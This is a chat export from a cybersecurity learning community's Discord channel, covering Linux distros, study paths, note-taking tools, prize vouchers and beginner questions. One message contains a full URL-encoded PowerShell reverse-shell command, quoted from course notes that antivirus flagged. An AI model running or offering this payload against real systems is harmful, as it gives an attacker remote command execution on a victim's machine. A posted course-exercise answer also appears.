#quiet-conversation

1 messages · Page 10 of 1

mystic tulip
#

I use Kali in a VM for cybersecurity, so I don't need a cybersecurity focused distro as a host

#

Just something that isn't windows

twin ridge
#

Any distro should be fine

#

I use fedora, I've heard good things about pop os, some people like arch

toxic cedar
#

Can someone help me with this question XSS attacks are more than just JavaScript code. You also need to know the basics of HTML.

If you recall from the recipe, HTML tags are used to create elments on a web page. Sometimes injecting harmless HTML can lead to discovering XSS vulnerabilities, especially when your payload is blocked by the server.

GOAL:
Inject an extra paragraph element.

toxic cedar
#

Class I'm taking

south inlet
abstract prairie
#

Try Mint

mystic tulip
tawdry dove
#

Boots pretty fast for me

fossil sundial
#

ARCHLINUX BOOOOOOM

radiant jacinth
#

hello, can someone give me any good resources where i can read about vulnerabilities? also how those vulns were exploited. I've got some blog webs but they only talk about the vulnerability not how it was actually exploited.

#

and is there a way i could practice to exploit those on my own? Well, I'm not interested in web exploitation.

#

I mean if there was vulnerability found in an OS or any application and i wanna practice exploiting it and maybe write my own PoC.

fathom panther
atomic stirrup
#

Hey team! Happy thursday!

desert idol
#

@twilit portal Kebab

wraith patrol
#

Hello, have a question regarding my account. I previously created my first account with my student email, and made pretty good progress through some of the learning paths. TL;DR I was using a student account, but now my school has moved their email services to O365, and they removed my student email since i graduated in 2021, and I have lost access to this account.
Is there any way to get my data transferred over to my new account so I don't lose all of my progress?

tawdry dove
#

Oh, I see, nvm. I don't think that's possible

south inlet
#

@sturdy beacon I can't remember which channel you pinged me to ask about Reminna.

civic rootBOT
#

Done!

sturdy beacon
# south inlet

thank you: so kind of you for the follow-up
that was in #site-support when I experimented remmina with VNC to the AttackBox and I had that ugly effect: #site-support message
like in your GIF, I usually get good results with remmina and that button on the left for dynamic resolution update, in particular with THM Windows target machines
but not for this particular case of VNC and THM AttackBox

hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #1 - 2820)

analog basalt
#

Hello everyone, does someone remember where can I find the lessons on how images could be saved when uploaded in a web form? I studied it from the platform months ago but I forgot where to find it. Thx ❤️

fathom panther
spark sun
torn vale
#

hello, want to know about, what kind of premium content that THM gives if subcribed as premium user? if its not bother, would like to know first if its really any special content included or being trend?

pseudo fox
pseudo fox
radiant jacinth
drifting flax
#

Is cybersecurity same thing as hacking

#

Like if i go study cybersecurity is there hacking

radiant jacinth
drowsy beacon
#

if youre talking about studying in college then it probably wont be much of it unless you look specifically to take those courses

#

will be a lot of information security and business related things

#

like security and risk analysis, networking

#

some colleges let students pick from a variety of courses however -- mine has ethical hacking, malware analysis, and digital forensics (which is their blue team stuff)

#

check the academic course path for your program and see how well it fits your interests

radiant jacinth
south inlet
#

I learned how to do it inside and outside of college

drowsy beacon
#

^^

drowsy beacon
wraith patrol
hoary nymphBOT
#

Gave +1 Rep to @spark sun (current: #10 - 780)

south inlet
brisk folio
#

Wow! This room so easy I will complete it instantly 😂 😂

limpid sedge
#

quiet-conversation when loud-conversation walks in 😲

lucid eagle
#

Good morning

drifting flax
#

Should i go IT high school

misty seal
#

It's already the Q4 of the year Stop waiting for the perfect moment to chase your dreams, create that moment today, Remember, small steps of every single day will lead to big, life-changing results. You’ve got everything it takes, now is the time to start and make it happen, you still have the last quarter of the year to make to achieve success. Like I also did! Let's go!!

brisk folio
soft pier
brisk folio
soft pier
#

i.e split the year into 4 parts... and name them q1-q4

#

used very much inside business and for release dates

tardy cloak
modern mica
#

is anyone here?

analog dagger
#

No

drifting flax
#

No

radiant jacinth
#

Nope, that's why its quiet

blazing summit
shell pebble
#

Hello

drifting flax
#

Is there email bomber in kali linux

quaint basin
drifting flax
#

I wanna test it how it works and stuff like that

quaint basin
#

Uh huh. With what end goal?

drifting flax
#

Send friend very much email

quaint basin
#

Ah. Gotcha.
In that case @south inlet is the best person to answer 👍

drifting flax
#

Scary

south inlet
drifting flax
#

Just want to see how it works and maybe test it to friends

#

But nothing bad

south inlet
#

...That's not how it works.

That would be illegal, your friends don't own the email accounts

drifting flax
#

Like im new to this stuff i dont know

south inlet
south inlet
drifting flax
south inlet
radiant jacinth
#

Can I ask a question? Why does your mind connect email bombing and ethical hacking? Email bombing is just annoying and not ethical and not hacking neither.

drifting flax
hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #1 - 2834)

radiant jacinth
#

Alright, but keep that in mind, as Scrubz told you :)

drifting flax
#

(:

forest quartz
#

Does Discord use ur private or public IP in a vc for example?

tawdry dove
#

Private IP addresses are not routable on the open internet

midnight gust
#

969

copper flare
#

hi all,
i am getting 500 Something went wrong error when i am downloading the openvpn file from Access can someone help me out to resolve this issue?

molten sundial
#

How well do you guys think obtaining the Jr. Pentester Certificate through THM has prepared me for studying for the OCSP? 5%? 50%? Just curious how much harder the OSCP labs/course work will be compared to what THM Jr. Pentester path has taught me so far

radiant jacinth
#

Now idea how much, but OSCP is much harder

iron birch
#

Trying the "AD Exploitation" module should much better for understanding of AD.

#

Other then Learning, you can do the standalone boxes on tryhackme for practice + go over the TJnull's "OSCP List" and try HTB boxes.

#

One cool thing you should do is, taking good notes and making your personal cheetsheet.

snow gulch
#

i have half of my notes on paper and other half on a file 😭

snow gulch
iron birch
#

You can link topics to each other, like moc.

snow gulch
iron birch
snow gulch
iron birch
# iron birch

@snow gulch This isn't even mine lol, it's friends. Who takes very "Extensive" notes.

snow gulch
narrow socket
#

People

ashen pine
iron birch
hardy vessel
# iron birch

deam that is impressive i m using logseq but i have problem with sorting it out like i have mess in my notes should spend more time orginizing i guess

iron birch
#

it's friend's.

hardy vessel
#

i m wondering is there a way to like share my notes between devices cos in my work i m using company laptop and during pentests i have some notes but on my main machine i have the other half and i have raspberry just laying aroud it should be able to run some file sharing or idk never done that but i dont want it in some 3rd party cloud

iron birch
#

Depends on what Note Taking application you are using.

hardy vessel
#

logseq on both company and mine machine and for mobile too

iron birch
#

There should be something like that.

woven patrol
#

@misty obsidian hey, for pwncat-cs why didn't you use the setup with python poetry?
It's there in the docs, for the proper installation

misty obsidian
#

wait

#

how do you know about that? @woven patrol

#

that was also my next step lol

woven patrol
#

You can also create a virtualenv to use it, and create an alias for it to to run via tha venv directly

sick pivot
# hardy vessel logseq on both company and mine machine and for mobile too

Yeah I struggled with that too. The trouble is that Logseq is not letting you sync between devices. Because of their focus on security and privacy they store everything offline. I do believe they have a function in beta to sync if you contribute financially to the project. Besides that there is a work-around, but it’s a headache imo.

hardy vessel
hoary nymphBOT
#

Gave +1 Rep to @sick pivot (current: #2256 - 1)

sick pivot
#

But if the syncing is important to you I'd suggest checking out Anytype, it's not exactly the same as Logseq or Obsidian, but it has some similarities and does allow syncing across devices.

hardy vessel
#

well i prefer open source apps if i have an option but this seems interesting

sick pivot
night siren
#

Yeah me too, and very interesting

#

Hello what project going on

sick pivot
drifting flax
#

Does try hack me teach how to make malware

topaz cypress
#

i would like to learn about botnets and how to stop scam call centers

quick nova
brisk folio
#

What kinda methods do you guys use to take notes? Like digitally. I want to get into the habit of taking notes while I do the tryhackme rooms but I always get overwhelmed or forget to take notes and I want to work on that

radiant jacinth
#

it depands but usually i just read the entire page once and then the second time i write down in my own words things that seem important to know

#

sometimes i copy entire paragraphs remove something to make it shorter cause when i want to go back and read the notes i dont want to read a whole page just find the one thing i wanted

#

the main thing is to just write what seems important to remember the notes dont have to be perfect so dont worry about it the most difficult thing is to start

novel mist
sick pivot
brisk folio
#

@novel mist @sick pivot thanks for your recommendations! Will check those out

hoary nymphBOT
#

Gave +1 Rep to @novel mist (current: #2259 - 1)

brisk wyvern
#

Hey guys. I believe it's my first time asking this question here. I been doing SOC Analyst Level 1 for a while now. As I progress further, the challenges get tricky. There was some times I couldn't find information I want when googling before restorting to walk ups. I wanted to gather your wisdom on how to search for results before resorting to walk ups. For instance, SNORT and SNORT The basics really made me bang my head as I couldn't figure out proper commands. How do you approach that you are not familiar with it and where to look despite using (commands) --help?

brave berry
#

Hey y'all, I'm not sure if this is the right place to totally open up, but I joined here out of curiosity for general programming and Mr. Robot (😂).

#

I don't want to sound TV-brained, but would these learning tools potentially help to learn more about some harassment I've been receiving over the past couple of months? Nothing like precision tracking of this person, but rather some insight on who it may be, so I can not be so anxious all the time lol.

tawdry dove
brave berry
#

Unfortunately, I'm in Canada and these sorts of cases don't get much traction. To be fair, I haven't received anything really which leads me to believe I'll be harmed anytime soon (except for some vague "bad things will happen" text lol.)

#

I appreciate the response.

rapid bane
#

Funny I'm in Canada and went thru the same

crimson fulcrum
hardy elbow
#

guys is anyone here good with Spark ada

lime fern
#

Especially if you feel your life is being threatened, that heightens your case ten fold

brisk wyvern
brisk wyvern
crimson fulcrum
brave berry
brave berry
drifting flax
#

What prosent(%) of rooms is usable with free thm

tawdry dove
south inlet
#

It's closer to 60 now.

twin ridge
cedar belfry
#

Who plays COD HERE?

static vessel
cedar belfry
static vessel
#

Yes

south inlet
#

👀

hardy vessel
#

finally got lvl up ngl seeing that number go up kinda keeps me going

dark jetty
#

.

fringe warren
split thunder
#

Can I learn ethical hacking in lenovo ideapad 300?

#

Sorry 330.

weary meteor
hearty compass
#

hey guys what after i finish the road map i already bought premium

twin hare
#

which roadmap\

little shore
lofty ferry
quaint basin
#

Cherrytree is great until your notebook reaches a certain size

#

Mine started crashing at about 40MiB.
It's also a pain in the backside to export from.

Obsidian is great until you start taking notes on windows exploitation and store them on Windows. Then they start to disappear quite quickly. Disadvantages of storing your stuff in plaintext. Just ask @remote echo

Notion is great until the company decides they don't like your notes and cut your access... just ask @tribal heart kek

#

Trilium ftw

quasi narwhal
# quaint basin Mine started crashing at about 40MiB. It's also a pain in the backside to export...

My windows defender quarantines my "What The Shell?" notes because of this powershell command:
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

#

its in notepad.

#

says its a Trojan:PowerShell/ReverseShell.HNAA!MTB

quaint basin
#

Yeah, it'll do the same with Obsidian. Joys of storing your notes in plaintext

muted night
#

My computer is full can I move my Kali on my USB drive ?

tribal heart
#

Not a good idea to take notes on exploit development in other ppls websites anyways

spark sun
tawdry dove
ionic lance
#

I was enrolled at WGU, but I quit. Now I’m wondering what else I can do to break into the CS field. Honestly, I feel like I lack the mental fortitude for self-study, and constantly starting and stopping has me thinking about leaving it all behind.

chrome cairn
#

can anyone help me with that junior security analyst intro answer?

#

What will be your role as a Junior Security Analyst?

tranquil terrace
violet horizon
#

Is a virtual machine and home lab the same ?

humble mountain
# violet horizon Is a virtual machine and home lab the same ?

home lab is usually multiple virtual machines simulating a network. Like a windows server VM as a domain controller / DHCP / DNS and another windows server as a file server (shares and storage...) 2 other windows OS as clients.

This helps to practice pentesting a network. Getting access to a client > pivoting to the other client > getting access to the file server > and eventually getting access to the domain controller.

last hornet
#

I wanted to check if you have conducted security testing on macOS 15. If so, I would greatly appreciate your insights or any help you can provide from a security perspective. It would be helpful to understand any potential vulnerabilities or key areas to focus on

tribal heart
# ionic lance I was enrolled at WGU, but I quit. Now I’m wondering what else I can do to break...

Cybersecurity is a huge field with a lot of different types of problems. If you find one that keeps you curious and wanting to learn more, you can find a way. If you find yourself losing interest and not wanting to put in the effort even after taking a break, maybe you should think if it is the best field for you. In the end only you can tell and make that decision for yourself. But personally, curiosity is what kept me going, and why I keep going for more.

It is perfectly valid to also see it as a hobby and not a career path. Lots of ppl also do it like that. There is no "one size fits all", we are human, and your experience may vary.

graceful vault
#

had a question about ccna examination, do you need to have actual hands on experience with trouble shooting stuff and working with hardware or just theory knowledge is enough to crack it?

weary meteor
graceful vault
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #212 - 30)

violet horizon
#

Or do you switch between vms on 1 computer

humble mountain
violet horizon
#

Oh wow

humble mountain
# violet horizon Oh wow

I mean it's still possible to work with 32 GB. even with 16 GB but you're gonna have a painful time having all of those VMs on at the same time.
As a beginner 1 attacker machine for example kali linux, 1 windows server and 1 windows client is enough. This can be done with 16 GB ram as well.

valid lake
#

hi, is anybody able to help me with making requests? bit lost here

humble mountain
valid lake
#

yeaa

humble mountain
#

what is the problem?

valid lake
#

uhm im not sure what the id parameters mean like the key and value thingies

#

so i cant get the answers for 2 4 and 5 /:

humble mountain
#

parameters are what you see in the url:
www[.]blabla[.]com/index.php?parameter=value

humble mountain
valid lake
#

right but when u launch the simulator thingy it gives u like a configuration button

valid lake
humble mountain
valid lake
#

task 7, the very last one

humble mountain
#

for question 2:

the parameter is called idand the value is 1
click on the save icon and then go

valid lake
#

does that mean i dont put anything where it says "key"?

#

it still gave me a 404

fierce canopy
valid lake
#

oh i see, thanks sm!

humble mountain
south inlet
patent fox
#

hey guys; i love the new tryhackme web design 🔥

brisk folio
neon lily
#

is there a discord channel for windows based programming
using powershell x .bat (batch) x VBS x js x anything else that can be executed natively on windows
not restricted to using devcon and the useless dependencies
when you can program it the native way

I want to release in the future a certain windows bug patch related to windows behaving as if the computer no longer has a wifi adapter, and even disabling the ethernet adapter, this bug often occurs when the user uses hibernate, this bug has appeared from 2020-2021-2022 I've reported the bug to windows many times but they didn't even bother to read it or even react to it (when this bug occurs users often reset their computer reinstalling windows or even go as far as to switch to linux or other OS)

I happened to discover a valid remediation this year, all theses years I struggled with this bug unable to use wifi and relying on ethernet that often gets disconnected as well, thankfully ethernet can be easily reestablished, I didn't want to switch to linux or other OS because I simply didn't feel comfort but when using windows

months ago, I decided to write the patch as an automation, since manually doing a remediation is really annoying and a waste of a time for a programmer

I haven't completed writing the final patch
but the current patch I wrote using devcon solves the problem

however devcon seems like a hassle since an alpha user isn't supposed to install external dependencies when a simple problem can be solved natively

Recently I found out I can just write it fully in PowerShell which is better
since the simple user won't have to install any dependencies and would solve the problem immediately

I still haven't wrote the code in a full automated way that can be released as an official release, so right now it's still as instructions
even after completing the full automation, I want to make sure I'm doing things right

if yes how do i unlock it? which freemium challenges I need to conquer ?

reef river
patent fox
junior parrot
#

what does TBL stand for?

#

can someone help me

#

is it not tabletop?

weary meteor
junior parrot
#

cyber

weary meteor
#

Triple Bottom Line ?

forest igloo
#

.

loud path
#

I love pineapple juice with mayo

weak fog
#

kewpie mayo or regular mayo though?

wide jackal
#

Does anyone know how to fix the input lag in VMWare? I tried multiple solutions. One temporarily worked, others none.
Tell me the ones you know. I'll try it if I already haven't.

fathom panther
zealous wave
#

can anyone help me learning pentration testing

fathom panther
#

Try HackMe also has a new ongoing promotion for people wanting to learn Cyber. Have a look at #announcements message.

fluid hamlet
#

Looking for mates to skilled together on THM. I am up with basics but not pro or great.
Anyone up for this?

narrow shadow
green ingot
#

I started studying cybersecurity a little through tryhackme, in one of the rooms about research tools, I decided to open my Google and do a password search using the search parameters I learned, having just found a file with admin passwords for a website , other than site management gmail passwords, the question is, is this as far as I can go without breaking any laws? Or can I log into the website and email as admin because the passwords were relatively public on the internet?

shadow mauve
#

Might depend on where you live, but I guess you already answered that to yourself

fathom panther
#

That can be attributed as cybercrime or computer misuse by law as you do not have proper authorization on it.

#

My perspective is: OSINT is legal but you shouldn’t do it unless you have explicit permission, have a written contract or ROE in place.

brisk wyvern
#

Is it me or I'm noticing the patterns of each room comes with specific vms. Like I was just coming out of Zeek and I realized that it doesn't even have basic stuff like mouse which I had to use Nano just to make it easier to read the columns name instead of Cat which makes it bit difficult to read. Is that the purpose? To force you use cli all the time?

twin ridge
#

Vms are probably reused as well, or at least base vms

brisk wyvern
warm oracle
#

iirc, the Zeek rooms used a Linux VM with Zeek already installed, and it was using the zeek-cut command a bunch to output the specific field-value pairs you wanted

trim ledge
#

Hi here 🙂 ,
idk where to ask: is there any new room planned for this week ?
(i know there is 20+ rooms with cyber101)
i'm just asking, i already miss the new challenges fever TryFlagMe

radiant jacinth
#

hi can anyone help me pls with this q in the new path in thm in cryptography
Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?

violet horizon
#

ICANENCRYPT

remote yacht
# violet horizon ICANENCRYPT

don't post answers please
(also he has solved it already but that's not your fault for not seeing since it was in another channel)

violet horizon
#

oh sorry i didnt notice the thm abbreviation

#

(i was too excited to use the bruteforced i coded)

past olive
#

I know you already solved it but for future reference

zenith hornet
#

maybe through bolack loop?

#

black*

novel mulch
#

Can i be fully anonymous by using proxy chains and tor

south inlet
novel mulch
vagrant swallow
#

are all prizes of cyber101 got claimed?

little shore
little shore
little shore
spice mist
# little shore https://tryhackme.com/r/room/trywinme

I’ve been actively completing rooms—more than four in a single day—while studying, but I've noticed an issue with redeeming my tickets. After finishing each room, I receive only a 7-day streak freeze, a 1-day streak, or new badges.

Initially, I received various tickets, but now I hardly get any. Could you please help me understand why I'm not receiving the tickets

little shore
spice mist
#

Experiencing with ticket redemption. I've already redeemed my tickets and claimed my prizes, but Why ?

little shore
spice mist
gusty nymph
#

its first come first get

spice mist
#

But on the same side my friend also reciving the tickets like Laptop.

radiant jacinth
#

Does anyone get any voucher after completion of cybersecurity 101 path?

ionic hornet
hoary nymphBOT
#

Gave +1 Rep to @earnest tide (current: #2328 - 1)

radiant jacinth
past drift
#

what is everyone up to, today/this evening?

velvet hawk
#

programing

velvet hawk
sick meadow
sick meadow
past drift
sick meadow
past drift
sick meadow
#

Ahh okey 😄 Planning a marriage is supposed to be quite stressful. I hear

past drift
sick meadow
past drift
sick meadow
past drift
sick meadow
rustic pendant
#

Hi??

vagrant swallow
#

I m doing rooms but why I only getting cyber crusader, 1 week freeze & 7 day freeze?

stark agate
hazy breach
#

yrr please help me
in the room : Windows Fundamentals 1
I am unable to get the answers for task 6 of questions 2 and 4, please provide me both answers.

hazy breach
tawdry dove
vagrant swallow
tough halo
#

Anybody here to talk about codes?

sick meadow
#

what kind of?

tough halo
#

virus codes

sick meadow
#

nope sorry

tough halo
#

thanks

stark agate
tawdry dove
frail vaultBOT
gusty nymph
#

But HOPE

vagrant swallow
gusty nymph
cosmic flicker
#

I got 10 euro swag voucher but the shipping charge to my country is 10 euro🥲

vagrant swallow
uneven furnace
#

Yoo

#

Can anyone help me i need work experience in cyber security

#

For Y10

celest elbow
#

maybe this exists- but i would like to have an easy way to filter every CTF i should be able to RESOLVE by knowing every Room i have done! Not by level
FOr example . If i have done Intro to Cybersecurity and cybersecurity 101 , i should be in a level to finishes this... rooms!

mighty bluff
mighty bluff
# celest elbow maybe this exists- but i would like to have an easy way to filter every CTF i sh...

After a second read - you'd best review the learning paths. Before there were roadmaps for which room to tackle next as github repos. But I think THM team have put a lot of effort in their learning paths and modules to classify and grade learning topics.

Because there are a vast of topics on infosec. Some with more depth and context than others.
All the while the rooms themselves may require prerequisite knowledge on a couple of domains like - recon, privesc & vuln chain to get to the final flag.

There is no straightforward path to guide your every single step. And that's the beauty of it - you draw your own footpath.

analog basalt
#

Hello, is this the right place to report some bugs? In the room Blaster the second last question (Task 4) is deprecated by metasploit and can't be solved if there is no proficiency with the framework. Also in the first answer of Task 3 the information can't be accessed. I know the answer is in the Suggestion box but in the rdp machine the answer couldn't be found. Thx

celest elbow
south inlet
inland tiger
analog basalt
#

Thanks i haven't seen it !!

forest igloo
#

can someone recommend a good website to boy a vps to host a linux machine

#

I want to have a command that can be accesed from everywhere

vague sierra
forest igloo
#

Hacking, bug bounty, ctfs

inland tiger
# forest igloo Hacking, bug bounty, ctfs

I like to use interserver, just that's just my random personal preference haha. I rent a bare metal server from them and use that to host all kinds of things, including tools for security testing

mighty echo
#

DigitalOcean is all round the best imo

#

You can get free credits with Google cloud and azure. Oracle offer a 24GB RAM VPS always free but you do need to make a paid account.

#

I use a combination of Oracle with contaboo just because the prices are so damn good (£9 a month, VPS2 one)

dire sable
#

Contabo or Hetzner are by far one of the best bangs for the money. Huge resources for cheap.

fathom panther
#

I use Linode, its good and I think they support bug bounty hunting too

#

Hetzner has a rigorous identification process and I believe they don't like their cloud being used for bug bounty hunting that's why they can take down your account with no say.

dire sable
fathom panther
grave bridge
#

All I want for Christmas is DuPont Tychem 10000 Level A Suit

grave bridge
#

in what possible scenario did they put you in one of the best chemical resistant suits

#

huge lore drop

#

I still don't see how chem protection suit would benefit that role

#

It is a good suit

#

better safe than comfortable

rare galleon
#

have anyone want to make a team to play CTF every weekend?

raven storm
#

I started presecurity road. now I completed linux fundamentals. And I want know . Should I go these (bash and regular expressions ) before WIndows fundamentals?

weary meteor
#

It also has its use on Windows OS

spiral granite
#

hey! few days ago I saw the winme event accidentally on the announcements, and thought it'd be fun to participate specially that the fall's weather makes life a bit depressive! and so I was having fun finishing room after room, that all of a sudden my account got reset or something!
the website is asking me to verify my email account, which I no longer have access to :/
but the rest of my account data is verifiable! I was having fun 😦
now I don't seem to even be able to enter any room!

I want my account backpepehands

spiral granite
#

with another email address?

#

or do they have a phone line?
cause I posted in here hoping to catch the attention of the support team!

tawdry dove
#

You need to email support, they do not have a phone line as far as I'm aware, and support requests are not handled in the discord. Send an email using the address associated with your account. Support is very busy, so it will more than likely be a couple of days before you get a response. Remember, if you send a bunch of emails, your request will be moved to the back of the pile. It's how the ticketing system works.

raven storm
#

which rooms can I do after pre security ( CTF or attack machine)

marsh vortex
#

Friday challenge coming?

sharp prairie
#

is there anyway to make my kali linux thats running in a virtual box less laggy?

little shore
little shore
#

I would start at looking at Easy-rated boxes, but then again, it would depend on what concept has been included in a particular box.

sharp prairie
spiral granite
hoary nymphBOT
#

Gave +1 Rep to @tawdry dove (current: #17 - 469)

gaunt loom
#

yay guru

lunar parcel
#

hello

swift leaf
#

UwU

blazing summit
#

Hello fellas

fickle prairie
#

is it possible to earn money hacking legally making my own flexible hours?

i suppose it's a dumb question cause (almost) everything now a days we can work remotely but i don't seek much a career, more to enjoy and earn aswell

#

if yes, how sow?

fathom panther
slate dome
#

When you say security researcher what do you mean specifically and in what kind of setting?

#

Again, might seem like a stupid question but half of the machine learning and data scientists I know are all in reality a multipurpose coder, gofer, and general "how do we do this" guys wherever they find consistent work

#

And they're not exactly happy about it.

#

Same with cybersecurity

fickle prairie
#

it is a start

fickle prairie
fathom panther
#

Another can be security research and hunting 0-days on widely used products. Pwn2Own is an example of that kind of event.

hoary nymphBOT
#

Gave +1 Rep to @fathom panther (current: #20 - 428)

spark sun
spark sun
neon lily
# reef river so the main problem is that during hibernation the wifi adapter stops working?

I believe hibernation may not be the solid trigger, as windows is very much flawed by default the way windows mechanisms can self-conflict with ease
However, the laptops in which hibernate was activated upon, manifested said bug
This might not only affect windows 10, but it was mostly manifested in windows 10;
there's a slight chance this might occur in windows 8 due to similarities of mechanisms with windows 10, but currently i have no data to support that, so we assume it's a windows 10 bug unless proven otherwise

hibernation might trigger that
but this might get triggered without the user using hibernate as windows employs hibernate at certain circumstances automatically

which means by default using windows 10 with enough time, your computer will enter through hibernation even if you didn't trigger hibernate yourself, this depends on your battery settings and windows choosing to go through hibernate automatically under certain conditions

even using regular shutdown or restart doesn't solve the problem
the bug is way deeper than that
it's self-induced through windows mechanisms
the updates cannot deal with a "non existant" problem
windows won't fix those things unless a higher-up speaks up about it, it isn't considered a bug by windows since they don't even know about it
Even though that this bug was reported many times several years ago and no one cared, not even a reply or comment
I'm pretty sure I'm not the only one who reported this issue, I've met with people who had experienced the same level, and some of them because of that no longer use windows

( I didn't 100% proofread my text, so please don't mind my textual errors )

#

Even google isn't efficient at solving similar problems
they make the so called "top-conductors" who might not even qualify to fix said bugs same thing for windows
the same "top-grass" would dismiss core bugs and even label it as "chit-chat"
as this really happened to me years ago when i reported a core bug related to google translate to google, even though there was no possibility for me to report non-security bugs,
I managed to engineer entry to make a google "top-grass" to acknowledge my bug, after contacting a higher up google employee who gave me the privilège to report my bug directly to a "top-grass", yet said "top-grass" dismissed the core-bug, as they couldn't even understand the problem, even though i made it clearly illustrated with details, and they classify it as "chit-chat" and marked it as the equivalent of complete
while the core-bug was fixed maybe a year or even later after google testers found out about it

Companies only care about security bugs, since it can damage them financially
windows isn't aware of the bug or that it might damage its reputation and money, so that's why they won't cope with those issues

reef river
reef river
neon lily
#

nah linux i tried it

#

linux is pretty cool for coding
and maybe IT and just that

#

windows is even better in terms of visuals & softwares
can't wine them all

#

linux will make your machine way fast compared to windows

#

and for gaming, linux is still lacking

#

simply watching videos on linux feels a bit weird since the image isn't portrayed as good as windows

#

you can always VM everything and test-drive them all

#

for tryhackme & folks you'd need to use a linux based OS and maybe kali

#

also for malware dev or analysis windows feels really fresh

neon lily
#

windows works around money ( security updates always updated ) , but it's way too dysfunctional
( non-security bugs are way dismissed )
that disorder can be used against windows
< which makes exploring windows to me more fun >
I haven't reversed windows but many have done that

#

i can fix her

literally i can fix her

( referring to the windows dilemma )

I'm not gonna leave windows
i will fix the bugs
and will make windows better for everyone

south inlet
mystic tulip
#

U could daily drive parrot, or just install hacking tools on a daily drive focused distro

neon lily
#

VMing is the way ?

south inlet
#

For Kali, yes.

#

Anything else? Self preference

neon lily
#

i agree with that$

elfin urchin
#

Can anyone help me prize redemption on tickets " I have won the $20 swag voucher and redeemed it" now how to use it . !!

weary meteor
elfin urchin
#

about swag voucher also ??

weary meteor
elfin urchin
#

thanks. Got the mail

brisk folio
#

Did anyone get 3 laptop tickets yet??

elfin urchin
#

i am curious , who are the winner of defcon tickets !!

south inlet
stark stump
#

I get 3 defcon33 tickets

#

Which means i won the ticket for the event

#

??

brisk folio
brisk folio
weary meteor
brisk folio
weary meteor
brisk folio
# weary meteor If you win the cap, then the cap is free

That's what I'm wondering. They sent a code to use at checkout to get the free cap, which I've applied, but it doesn't cover all of the price 😂 cap costs CAD29.47 and the discount removes CAD27.63. I was wondering here if that's normal or if I'm doing something wrong here

south inlet
brisk folio
jade hinge
#

Guys why do they want my discord passowrd?

#

thats sketchy idk why i did that

restive steppe
#

How does it work with the big prizes where you're supposed to email in to claim the reward? Are 100's of people winning and they are then chosen at random from all the emails? Or is it just a select few who are actually getting 3 of a kind for the prizes?

south inlet
jade hinge
#

the server

#

made me log in using my dicord passowrd

jade hinge
#

any recomendations on how to learn how to hack like other peoples computers

brisk folio
rugged frigate
jade hinge
velvet hawk
#

Depends if you’re doing it illegally without permission.

fickle prairie
#

any experts or more experienced leveled pentesters or soc freelancer would aknowledge if I follow step by step o THM paths it will lead me being a good hacker?

quartz heron
golden aurora
#

Once finished the path is it possible to applyvfor entry cybersecurity job as Soc analyst for example?

fickle prairie
quartz heron
golden aurora
#

Its true that bases on some country things can be different. Anyone has some review for france?

nova tree
#

You would typically need a mix of tehnical and analytical skills and be familiar with security tools

#

And internships would be even more valued

golden aurora
#

It's kinda tough to get into cyberjob even if on article they said that the field needs people.

golden aurora
elfin urchin
odd acorn
#

Hey, please don't self promote here #rules

icy swift
#

I won the seven day streak freeze, but still my streak reset after missing one day. Will the streak freeze get credited afterwards.

cosmic star
#

Hmm

icy swift
turbid spruce
brisk folio
odd acorn
brisk folio
odd acorn
brisk folio
#

Oh right

#

I also don't have a support query though 😀

odd acorn
#

Just had to check as 2-3 years is quite long whereas I was under the impression support got back to queries in under 7 days 🙂

icy swift
#

I just didn't want to bother the support, after all it was just 14 day streak.

fair stirrup
#

@dreamy kayak @twin ridge

limpid helm
#

hi help me

tawdry dove
limpid helm
# tawdry dove With?

I am a new person, I just bought preminium and there are ready-made road maps, I don't know how to proceed when I finish the road map, I don't know how to solve which ctfs, I am very confused right now, can someone knowledgeable help me?

brisk folio
#

if you don't have a security foundation, i recommend you start by completing the pre-sec or cyber sec 101 roadmaps. they will give you the basis of cyber security concepts. the roadmaps contains practical tasks so you can experience ctfs with more guidance.

if you have a security foundation, you can go to the practice tab and sort ctfs by difficulty

lilac zinc
#

Hi! I'm in Cybersecurity 101 in the cryptography lessons, and I'm trying to make a Caeser decipher script using the script knowledge from previous Linux lessons. This script gives me an error "command not found" on line 13. I'd like to add the "i" after calling the Rot function, to search for all the Rot variables I entered manually. Could you point me in the right direction for this command to call correctly?
`ciphertext=""
rot1="tr 'A-Z' 'B-ZA-B'"
rot2="tr 'A-Z' 'C-ZA-C'"

echo "What is your ciphertext?"
read ciphertext

for i in {1..25}; do
echo "$ciphertext" | $rot"$i"
done`

gusty nymph
#

that is really easy

lilac zinc
#

i don't know python yet, I'm just trying to use bash script since I learned it in the previous course

gusty nymph
#

CHAT GPT SAID "The error comes from how rot"$i" is being called. In your script, $rot"$i" doesn’t dynamically build the command as intended. To fix this, you can use an eval command to interpret the variable name and execute it as a command."

lilac zinc
#

Oh, could you tell me what prompt you used to ask chatgpt for errors? I never used it for this

lilac zinc
#

Lol makes sense

gusty nymph
#

you can learn alot from GPT

tawdry dove
gusty nymph
#

knowing what is wrong with my code

tawdry dove
#

My response doesn't change, it can still be wrong even with code

gusty nymph
tawdry dove
#

Creating memes such as glue on pizza? Sure

#

You're better off learning the "old fashioned way" at this point because you won't know when it's lying to you

gusty nymph
#

@tawdry dove You are a senior to me so i respect your point

jovial forum
#

But mistakes happen the old fashioned way also

#

Best to consult multiple sources, chat gpt, text books, fourms.

velvet hawk
#

